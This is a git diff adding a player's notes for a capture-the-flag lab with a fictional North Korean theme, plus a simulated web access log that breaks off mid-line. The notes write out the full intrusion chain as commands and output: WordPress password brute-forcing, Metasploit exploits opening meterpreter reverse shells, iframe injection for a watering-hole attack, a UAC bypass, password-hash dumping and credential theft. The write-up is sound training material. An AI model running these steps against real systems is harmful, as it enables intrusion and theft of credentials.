diff --git a/Kaizen/MissileDestroyer/Notes.md b/Kaizen/MissileDestroyer/Notes.md new file mode 100644 index 0000000..01f5e39 --- /dev/null +++ b/Kaizen/MissileDestroyer/Notes.md @@ -0,0 +1,791 @@ + +==PCAP Challenges== + +They give you a pcap + +Watering Hole 1 - The URL for the North Kiringul Central News Agency's website is www.nkcna.ctf + +===PCAP 1=== +The IP Address of www.nkcna.ctf is 172.25.45.92 + +===PCAP 2=== +The IP Address of the proxy server is 192.168.51.66 + +===PCAP 3=== +How many unique times has 192.168.51.66 browsed to the NKCNA homepage at http://www.nkcna.ctf/? + +213 times. I used this wireshark filter: ip.src == 192.168.51.66 && http.host == www.nkcna.ctf && http.request.uri == / + +===PCAP 4=== +Aside from HTTP and DNS, what other unencrypted protocol is found in the PCAP? + +FTP. I used this wireshark filter: ip.src == 192.168.51.66 && !http && !dns + +===PCAP 5=== +What is the password of the user that logs in to the FTP server? + +daebak + +===PCAP 6=== +Login to the FTP server using the credentials you found in the PCAP. + +What is the MD5 hash of the WordPress_Security.pdf file on the server? + + +Creds: koli/daebak + +Hash 873f9e060518b04c85ae59f0fbdbabc9 + +==Watering Hole Challenges== + +Helpful to use `wpscan`. + +`wpscan --url http://www.nkcna.ctf/` + +===Watering Hole 3=== + +What is the version of Wordpress being used? 4.7.2 + +Output from wpscan + +===Watering Hole 4=== + +What is the username of the person who likely posts the news stories? + +nkcna_author + +`wpscan --url http://www.nkcna.ctf/ --enumerate u` + +===Watering Hole 5=== + +What is the nkcna_author's cleartext password? + +
+[+] Performing password attack on Wp Login against 1 user/s +[SUCCESS] - nkcna_author / zxcvbnm +Trying nkcna_author / samsung Time: 00:00:32 <============================================================================================================> (255 / 255) 100.00% Time: 00:00:32 ++ +`wpscan --url http://www.nkcna.ctf/ -U nkcna_author --passwords /usr/share/wordlists/rockyou.txt --disable-tls-checks` + + +===Watering Hole 6=== + +What is the English title of the most recent draft post? + +Missile Launch Great Success for Our Glorious Leader + +===Watering Hole 7=== + +What is the name of the Metasploit module that will gain remote code execution? + +
+% wpscan --url http://www.nkcna.ctf/ -e vp --plugins-detection aggressive --api-token cuFIUjchD +... + +[+] Enumerating Vulnerable Plugins (via Aggressive Methods) + Checking Known Locations - Time: 00:02:40 <============================================================================================================> (2315 / 2315) 100.00% Time: 00:02:40 +[+] Checking Plugin Versions (via Passive and Aggressive Methods) + +[i] Plugin(s) Identified: + +[+] all-in-one-seo-pack + | Location: http://www.nkcna.ctf/wp-content/plugins/all-in-one-seo-pack/ + | Last Updated: 2020-07-15T13:05:00.000Z + | Readme: http://www.nkcna.ctf/wp-content/plugins/all-in-one-seo-pack/readme.txt + | [!] The version is out of date, the latest version is 3.6.2 + | + | Found By: Known Locations (Aggressive Detection) + | - http://www.nkcna.ctf/wp-content/plugins/all-in-one-seo-pack/, status: 200 + | + | [!] 5 vulnerabilities identified: + | + | [!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS) + | Fixed in: 2.3.7 + | References: + | - https://wpvulndb.com/vulnerabilities/8538 + | - https://seclists.org/fulldisclosure/2016/Jul/23 + | - https://web.archive.org/web/20160508074631/http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/ + | - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html + | - https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability + | - https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/ + | + | [!] Title: All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS) + | Fixed in: 2.3.8 + | References: + | - https://wpvulndb.com/vulnerabilities/8558 + | - https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/ + | - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/ + | - https://web.archive.org/web/20161019215603/https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/ + | + | [!] Title: All in One SEO Pack <= 2.9.1.1 - Authenticated Stored Cross-Site Scripting (XSS) + | Fixed in: 2.10 + | References: + | - https://wpvulndb.com/vulnerabilities/9159 + | - https://www.ripstech.com/php-security-calendar-2018/#day-4 + | - https://wordpress.org/support/topic/a-critical-vulnerability-has-been-detected-in-this-plugin/ + | - https://semperfiwebdesign.com/all-in-one-seo-pack-release-history/ + | + | [!] Title: All In One SEO Pack < 3.2.7 - Stored Cross-Site Scripting (XSS) + | Fixed in: 3.2.7 + | References: + | - https://wpvulndb.com/vulnerabilities/9915 + | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16520 + | - https://github.com/sbaresearch/advisories/tree/public/2019/SBA-ADV-20190913-04_WordPress_Plugin_All_in_One_SEO_Pack + | + | [!] Title: All in One SEO Pack < 3.6.2 - Authenticated Stored Cross-Site Scripting + | Fixed in: 3.6.2 + | References: + | - https://wpvulndb.com/vulnerabilities/10320 + | - https://www.wordfence.com/blog/2020/07/2-million-users-affected-by-vulnerability-in-all-in-one-seo-pack/ + | - https://www.youtube.com/watch?v=2fqMM6HRV5s + | + | Version: 2.3.6.1 (80% confidence) + | Found By: Readme - Stable Tag (Aggressive Detection) + | - http://www.nkcna.ctf/wp-content/plugins/all-in-one-seo-pack/readme.txt + +[+] sexy-contact-form + | Location: http://www.nkcna.ctf/wp-content/plugins/sexy-contact-form/ + | Last Updated: 2015-03-13T21:02:00.000Z + | Readme: http://www.nkcna.ctf/wp-content/plugins/sexy-contact-form/readme.txt + | [!] The version is out of date, the latest version is 1.0.0 + | + | Found By: Known Locations (Aggressive Detection) + | - http://www.nkcna.ctf/wp-content/plugins/sexy-contact-form/, status: 403 + | + | [!] 1 vulnerability identified: + | + | [!] Title: Creative Contact Form <= 0.9.7 Shell Upload + | Fixed in: 1.0.0 + | References: + | - https://wpvulndb.com/vulnerabilities/7652 + | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8739 + | - https://www.exploit-db.com/exploits/35057/ + | - https://packetstormsecurity.com/files/131513/ + | - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_creativecontactform_file_upload + | + | Version: 0.9.7 (100% confidence) + | Found By: Readme - Stable Tag (Aggressive Detection) + | - http://www.nkcna.ctf/wp-content/plugins/sexy-contact-form/readme.txt + | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) + | - http://www.nkcna.ctf/wp-content/plugins/sexy-contact-form/readme.txt + ++ + +https://wpvulndb.com/vulnerabilities/7652 from above output +`exploit/unix/webapp/wp_creativecontactform_file_upload` + +===Watering Hole 8=== + +Now that we have access, what is WordPress database password in wp-config.php? + +
+% msfconsole +msf5 > use exploit/unix/webapp/wp_creativecontactform_file_upload +[*] No payload configured, defaulting to php/meterpreter/reverse_tcp +msf5 exploit(unix/webapp/wp_creativecontactform_file_upload) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Creative Contact Form 0.9.7 + +msf5 exploit(unix/webapp/wp_creativecontactform_file_upload) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Creative Contact Form 0.9.7 + +msf5 exploit(unix/webapp/wp_creativecontactform_file_upload) > show options + +Module options (exploit/unix/webapp/wp_creativecontactform_file_upload): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 172.25.45.92 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:+ +MoreLikeKimJongFUN + +===Watering Hole 9=== + +What is the full path to where Apache logs web access requests? + +'/var/log/apache2/access.log' + +===Watering Hole 10=== + +What is the full path to the setuid binary that will allow us to read the log file? + +`find / -perm -u=s -type f 2>/dev/null` + +/usr/local/bin/readlog + +===Watering Hole 11=== + +What URL is frequently accessed by a user in the DPRK source IP range? + +`/usr/local/bin/readlog /var/log/apache2/access.log` + + +/submit_story.html + +===Watering Hole 12=== + +What is the target's user-agent string? + +Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko + +===Watering Hole 13=== + +What browser are they using? + +Internet Explorer 11 + +===Watering Hole 14=== + +Based on the user-agent string, what OS version is the target running? + +Windows 8.1 + +===Watering Hole 15=== + + Login to your test Window 8.1 VM. What is the default home page set for IE11? + + +http://www.nkcna.ctf/submit_story.html + +===Watering Hole 16=== + +"What version of Adobe Flash is intalled?" + +18.0.0.194 + +===Watering Hole 17=== + +"What metasploit module can exploit the installed adobe version?" + +exploit/multi/browser/adobe_flash_hacking_team_uaf + + +===Planner 1=== + +What is the IP address of the host found? + +Open a new terminal window to run a second metasploit module. + +' + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + TARGETURI / yes The base path to the wordpress application + VHOST no HTTP server virtual host + + +Payload options (php/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 10.13.0.151 yes The listen address (an interface may be specified) + LPORT 9090 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Creative Contact Form 0.9.7 + +msf5 exploit(unix/webapp/wp_creativecontactform_file_upload) > exploit + +[*] Started reverse TCP handler on 10.13.0.151:9090 +[+] Our payload is at: UaVSzxGiuE.php. Calling payload... +[*] Calling payload... +[*] Sending stage (38288 bytes) to 172.25.45.92 +[*] Meterpreter session 1 opened (10.13.0.151:9090 -> 172.25.45.92:42078) at 2020-07-23 11:31:06 -0400 +[+] Deleted UaVSzxGiuE.php +ls + +meterpreter > ls +Listing: /var/www/html/wp-content/plugins/sexy-contact-form/includes/fileupload/files +===================================================================================== + +Mode Size Type Last modified Name +---- ---- ---- ------------- ---- +100644/rw-r--r-- 0 fil 2016-08-25 03:09:32 -0400 index.html + +
+msf5 > use exploit/multi/browser/adobe_flash_hacking_team_uaf +[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > show options + +Module options (exploit/multi/browser/adobe_flash_hacking_team_uaf): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Retries true no Allow the browser to retry the module + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. + SRVPORT 8080 yes The local port to listen on. + SSL false no Negotiate SSL for incoming connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URIPATH no The URI to use for this exploit (default is random) + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.2.120 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows + + +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set LHOST 10.13.0.151 +LHOST => 10.13.0.151 +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set SRVHOST 10.13.0.151 +SRVHOST => 10.13.0.151 +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Windows + 1 Linux + + +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set target 0 +target => 0 +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 10.13.0.151:4444 +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > [*] Using URL: http://10.13.0.151:8080/VIKfXc4aGma1bJ6 ++ +In one terminal window running the initial metasploit module, edit submit_story.html with an iframe that refers to the URI given by the adobe module above. + +Sessions will connect to that second module: + +
+ +[-] Unknown command: session. +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > sessions + +Active sessions +=============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 6 meterpreter x86/windows DPRK\choe.hang-na @ PLANNER 10.13.0.151:4444 -> 192.168.51.66:49450 (192.168.100.10) + +msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > sessions -i 6 +[*] Starting interaction with 6... + +meterpreter > +meterpreter > +meterpreter > ls +Listing: C:\Users\choe.hang-na\Desktop +====================================== + +Mode Size Type Last modified Name +---- ---- ---- ------------- ---- +100666/rw-rw-rw- 1674 fil 2017-02-24 15:26:02 -0500 Excel.lnk +100666/rw-rw-rw- 1694 fil 2017-02-24 15:26:08 -0500 Word.lnk +100666/rw-rw-rw- 282 fil 2017-02-21 03:09:43 -0500 desktop.ini + +meterpreter > ipconfig + +Interface 1 +============ +Name : Software Loopback Interface 1 +Hardware MAC : 00:00:00:00:00:00 +MTU : 4294967295 +IPv4 Address : 127.0.0.1 +IPv4 Netmask : 255.0.0.0 +IPv6 Address : ::1 +IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff + + +Interface 3 +============ +Name : Intel(R) 82574L Gigabit Network Connection +Hardware MAC : 50:57:4e:17:01:01 +MTU : 1500 +IPv4 Address : 192.168.100.10 +IPv4 Netmask : 255.255.255.0 + + +Interface 4 +============ +Name : Microsoft ISATAP Adapter +Hardware MAC : 00:00:00:00:00:00 +MTU : 1280 +IPv6 Address : fe80::5efe:c0a8:640a +IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff ++ +Pro Tip 1: We will be doing quite a bit of work in this network and will need some help. If you haven't already, help your teammates gain access to the network and divide/conquer on the machines. We suggest adding multiple iframes, one pointing to each of your teammate's tap0 IP address then have them run their own exploit to get shells. + +use exploit/multi/browser/adobe_flash_hacking_team_uafset SRVPORT 80set URIPATH /set payload windows/meterpreter/reverse_tcpset LHOST
nmap -sV -sC 192.168.51.66 -p 21 +Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-23 10:02 EDT +Nmap scan report for 192.168.51.66 +Host is up (0.020s latency). + +PORT STATE SERVICE VERSION +21/tcp open ftp Microsoft ftpd +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_-rwxrwxrwx 1 owner group 49 Apr 27 9:49 NOTICE.txt [NSE: writeable] +| ftp-syst: +|_ SYST: Windows_NT +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 1.03 seconds+ +===KPASRF 4=== +Let's enumerate the web server for vulnerabilites. + +What version of IIS is the web server running? + +8.0 + +
nmap -sV -sC 192.168.51.66 -p 80 +Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-23 10:07 EDT +Nmap scan report for 192.168.51.66 +Host is up (0.021s latency). + +PORT STATE SERVICE VERSION +80/tcp open http Microsoft IIS httpd 8.0 +| http-methods: +|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL PUT +|_http-server-header: Microsoft-IIS/8.0 +|_http-svn-info: ERROR: Script execution failed (use -d to debug) +|_http-title: Kiringul People's Army - Strategic Rocket Forces +| http-webdav-scan: +| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE +| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL +| WebDAV type: Unknown +| Server Date: Thu, 23 Jul 2020 14:07:18 GMT +| Server Type: Microsoft-IIS/8.0 +| Exposed Internal IPs: +| 192.168.51.66 +| Directory Listing: +| http://192.168.51.66/ +| http://192.168.51.66/App_Data/ +| http://192.168.51.66/aspnet_client/ +| http://192.168.51.66/bin/ +| http://192.168.51.66/index.html +| http://192.168.51.66/kpasrf.jpg +|_ http://192.168.51.66/web.config +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 8.76 seconds+ +===KPASRF 5=== +What administration module is enabled on this webserver, which could allow a remote user to upload or modify files? + +WebDAV + +===KPASRF 6=== +What is the name of a Metasploit module that could exploit one of the discovered flaws in this webserver? + +iis_webdav_upload_asp + +===RECON 1=== +Exploit onto the KPASRF webserver and get a shell. + +What is the contents of the text file in the C:\ directory? + +"This machine to be decomissioned on April 1 2014." + +Use iis_webdav_upload_asp as described here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md + +Steps in msfconsole: + +
> use exploit/windows/iis/iis_webdav_upload_asp +> set payload windows/meterpreter/reverse_tcp +> set RHOST 192.168.51.66 +> set LHOST 10.13.0.150 +> exploit+ +==RECON Challenges== + +===Recon 2=== +What domain is this machine a part of? + +DPRK.CTF + +run systeminfo from meterpreter + +===Recon 3=== +Including the machine that you're currently on, how many hosts are in the 192.168.100.0/24 subnet + +7 (not counting the .255 entry below, I guess?) + +
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.100.0/24 + +[*] Running module against KPASRF-INTERNET +[*] ARP Scanning 192.168.100.0/24 +[+] IP: 192.168.100.1 MAC 00:50:56:bd:b2:00 (VMware, Inc.) +[+] IP: 192.168.100.15 MAC 50:57:4e:17:01:02 (UNKNOWN) +[+] IP: 192.168.100.10 MAC 50:57:4e:17:01:01 (UNKNOWN) +[+] IP: 192.168.100.20 MAC 50:57:4e:17:01:04 (UNKNOWN) +[+] IP: 192.168.100.25 MAC 50:57:4e:17:01:03 (UNKNOWN) +[+] IP: 192.168.100.240 MAC 50:57:4e:17:01:0a (UNKNOWN) +[+] IP: 192.168.100.250 MAC 50:57:43:17:01:05 (UNKNOWN) +[+] IP: 192.168.100.255 MAC 50:57:4e:17:01:0a (UNKNOWN)+ +===Recon 4=== +What is the IP of the domain controller? + +192.168.100.250 + +run post/windows/gather/enum_domains + +===Recon 5=== +What operating system is the domain controller running? + +Windows 2012 R2 Standard + +
meterpreter > run autoroute -s 192.168.100.0/24 +meterpreter > background +msf5 exploit(windows/iis/iis_webdav_upload_asp) > use auxiliary/scanner/smb/smb_version +msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.13.0.150 +msf5 auxiliary(scanner/smb/smb_version) > run+ +===Developer 1=== +What is the IP address of the developer's machine? + +192.168.100.15 + +I used nslookup from meterpreter + +===Recon 6=== +What is the IP address of the administrator's machine? + +192.168.100.25 + +===Recon 7=== +What is the IP address of the Glorious Leader's machine? + +192.168.100.20 + +===Recon 8=== +Local admin is dprkadmin + +use post/windows/gather/enum_logged_on_users + +===Administrator 1=== + +we know the logged on user is a member of the local administrators group: + +
C:\Users\choe.hang-na\Desktop>net localgroup administrators +net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +DPRK\choe.hang-na +dprkadmin +The command completed successfully.+ +Use a UAC bypass to get system, then dump hashes: + +
use exploit/windows/local/bypassuac_eventvwr +set payload windows/meterpreter/reverse_tcp +set target 0 +set lhost 10.13.0.150 +exploit+ +You should get a new session. Connect to it and run: + +
getsystem +run post/windows/gather/hashdump+ +Hash is c7823c16ddd435c49decf92a8d54058f + +===Recon 9=== +What is local admin password (in clear text)? + +Password: i_see_ur_cpassword + +
use post/windows/gather/credentials/gpp +set session 1 +set domains DPRK +exploit+ +==Developer== + +===Developer 2=== +What is the application running on port 80 of the developer's machine? + +Jupyter + +meterpreter > portfwd add -l 8080 -p 80 -r 192.168.100.15 + +Open a web browser and go to localhost:8080 + +===Developer 3=== +What is the full path to the tlc.py file shown in Jupyter? + +C:\Users\lee.tonghyon\Projects\tlc_jupyter\code + +Open a Jupyter notebook and run this: + +
import os +print os.getcwd()+ +===Developer 4=== +What is the MD5 of the zip containing the most recent launch code release? + +8bed361cf06ae70c2078e136d6f35aa5 + +Run this in the python notebook: + +
import os +import sys +import subprocess + +#print os.popen("dir C:\\Users\\lee.tonghyon\\Documents").read() +print os.popen("copy C:\\Users\\lee.tonghyon\\Documents\\TLC_release_v1.2.zip C:\\Users\\lee.tonghyon\\Projects\\tlc_jupyter\\code").read()+ +===Developer 5=== +What is the domain name of the production MQTT endpoint? + +mqtt.dprk.ctf + +Unzip the release, look at the config file. + +===Developer 6=== +enter a valid turret move command payload using the latitude and longitude coordinates from the first test launch location found on the PLANNER machine. + +missile/control/commands34:move:39.271767,127.625128:0615569d + +Run the script and use wireshark + +==Planner== + +===Planner 2=== +What is the username of the account? + +choe.hang-na + +===PTZ Camera 1=== + +What internal/private IP has this user browsed recently? + +
+ +meterpreter > run post/windows/manage/migrate +meterpreter > run post/multi/manage/autoroute +meterpreter > shell +[*] 192.168.100.10 - Meterpreter session 92 closed. Reason: Died + + + +reg query "HKCU\Software\Microsoft\Internet Explorer\TypedURLs" +Process 4756 created. +Channel 1 created. +Microsoft Windows [Version 6.3.9600] +(c) 2013 Microsoft Corporation. All rights reserved. + +C:\Users\choe.hang-na\AppData\Roaming\Microsoft\Windows\Recent> +C:\Users\choe.hang-na\AppData\Roaming\Microsoft\Windows\Recent> +C:\Users\choe.hang-na\AppData\Roaming\Microsoft\Windows\Recent> +C:\Users\choe.hang-na\AppData\Roaming\Microsoft\Windows\Recent>reg query "HKCU\Software\Microsoft\Internet Explorer\TypedURLs" + +HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs + url1 REG_SZ http://chrome.google.com/ + url2 REG_SZ http://google.com/ + url3 REG_SZ http://firefox.com/ + url4 REG_SZ http://pastebin.com/m0PAk4ri + url5 REG_SZ http://192.168.51.66:21042/ + url6 REG_SZ http://192.168.102.70/ + url7 REG_SZ https://www.nkcna.ctf/submit_story.html ++ +192.168.102.70 + + +===Planner 3=== + +What recent document was edited? + +
+meterpreter > ls +Listing: C:\Users\choe.hang-na\AppData\Roaming\Microsoft\Office\Recent +====================================================================== + +Mode Size Type Last modified Name +---- ---- ---- ------------- ---- +100666/rw-rw-rw- 649 fil 2017-02-28 21:05:57 -0500 SimulationAndTestData.LNK +100666/rw-rw-rw- 94 fil 2017-02-24 15:25:10 -0500 index.dat + +meterpreter > cat SimulationAndTestData.LNK +L�F� *�M0�� +P�O� �:i�+00�/C:\\1wP�HIDEFI~1D �aJP�.�M"��hidefiles�2�DaJ� SIMULA~1.XLSf �aJ�aJ�.�N�qSimulationAndTestData.xlsxV-U����C:\hidefiles\SimulationAndTestData.xlsx9..\..\..\..\..\..\..\hidefiles\SimulationAndTestData.xlsx`�XplanneryT���D���MG�X�e��<����QPWNyT���D���MG�X�e��<����QPWN ++ +===Planner 4=== + +What was the latitude and longitude of their first test launch target? (Format: latitude, longitude) + +39.271767, 127.625128 + +===Planner 5=== + +Trilaterate the source of the missiles. +39.0458535576, 125.762142247 diff --git a/Kaizen/MissileDestroyer/access.log b/Kaizen/MissileDestroyer/access.log new file mode 100644 index 0000000..bd520be --- /dev/null +++ b/Kaizen/MissileDestroyer/access.log @@ -0,0 +1,1194 @@ +/usr/local/bin/readlog /var/log/apache2/access.log +176.46.1.14 - - [23/Jul/2020:11:17:01 -0500] "POST /quality-waterproof-liquid-made/ HTTP/1.1" 404 4772 "http://www.foxnews.ctf" "Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0" +101.209.200.206 - - [23/Jul/2020:11:17:04 -0500] "GET /kim-jong-fun/ HTTP/1.1" 200 9355 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +156.42.190.161 - - [23/Jul/2020:11:17:05 -0500] "GET /99-problems/ HTTP/1.1" 200 8360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50" +167.224.202.215 - - [23/Jul/2020:11:17:08 -0500] "GET /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 200 4218 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +65.198.232.82 - - [23/Jul/2020:11:17:09 -0500] "GET /en/dprk-figure-skaters-prove-successful-in-asian-cup-tournament/ HTTP/1.1" 200 12012 "http://www.nkcna.ctf" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" +168.135.174.11 - - [23/Jul/2020:11:17:10 -0500] "POST /new-mushroom-research-institute-inaugurated/ HTTP/1.1" 200 8916 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10" +42.1.44.167 - - [23/Jul/2020:11:17:12 -0500] "GET /en/mens-premier-soccer-league-for-torch-cup-in-dprk/ HTTP/1.1" 200 9028 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" +135.53.134.102 - - [23/Jul/2020:11:17:13 -0500] "POST / HTTP/1.1" 200 8852 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10" +145.218.244.203 - - [23/Jul/2020:11:17:17 -0500] "POST /en/nuke-the-chinese/ HTTP/1.1" 200 4175 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" +192.168.51.66 - - [23/Jul/2020:11:17:20 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +92.75.61.42 - - [23/Jul/2020:11:17:20 -0500] "POST / HTTP/1.0" 200 5028 "http://www.google.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +214.173.82.89 - - [23/Jul/2020:11:17:22 -0500] "GET /new-kind-of-flowerpot-invented/ HTTP/1.1" 200 14590 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" +247.135.29.180 - - [23/Jul/2020:11:17:25 -0500] "GET /en/ HTTP/1.1" 301 9384 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" +91.229.193.30 - - [23/Jul/2020:11:17:29 -0500] "GET /en/ HTTP/1.1" 304 10787 "http://www.nkcna.ctf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4" +16.155.140.138 - - [23/Jul/2020:11:17:30 -0500] "GET /fifa-refereeing-course-held-in-dprk/ HTTP/1.1" 404 14117 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +32.146.206.207 - - [23/Jul/2020:11:17:32 -0500] "POST /en/3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 11376 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0" +167.97.183.241 - - [23/Jul/2020:11:17:33 -0500] "GET /kim-jong-un-visits-taedonggang-pig-farm/ HTTP/1.1" 200 12068 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +89.114.209.141 - - [23/Jul/2020:11:17:37 -0500] "GET /en/ HTTP/1.1" 200 10009 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +102.165.241.50 - - [23/Jul/2020:11:17:39 -0500] "GET /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 304 4771 "http://www.nkcna.ctf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36" +220.59.101.62 - - [23/Jul/2020:11:17:43 -0500] "GET /phyongchon-pickle-factory/ HTTP/1.1" 200 9801 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" +187.121.12.99 - - [23/Jul/2020:11:17:44 -0500] "POST /floral-baskets-to-kim-jong-un-from-foreign-personages/ HTTP/1.1" 400 6442 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" +164.200.246.189 - - [23/Jul/2020:11:17:48 -0500] "POST /3rd-national-conference-of-financial-and-banking-officials-held/ HTTP/1.1" 200 11726 "http://www.nkcna.ctf" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" +192.168.51.66 - - [23/Jul/2020:11:17:50 -0400] "GET /submit_story.html HTTP/1.1" 200 1169 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" +39.79.144.17 - - [23/Jul/2020:11:17:50 -0500] "GET /tablet-computer-popular-in-dprk/ HTTP/1.1" 500 13814 "http://www.pyingyongtoday.ctf" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0" +142.22.249.36 - - [23/Jul/2020:11:17:54 -0500] "GET 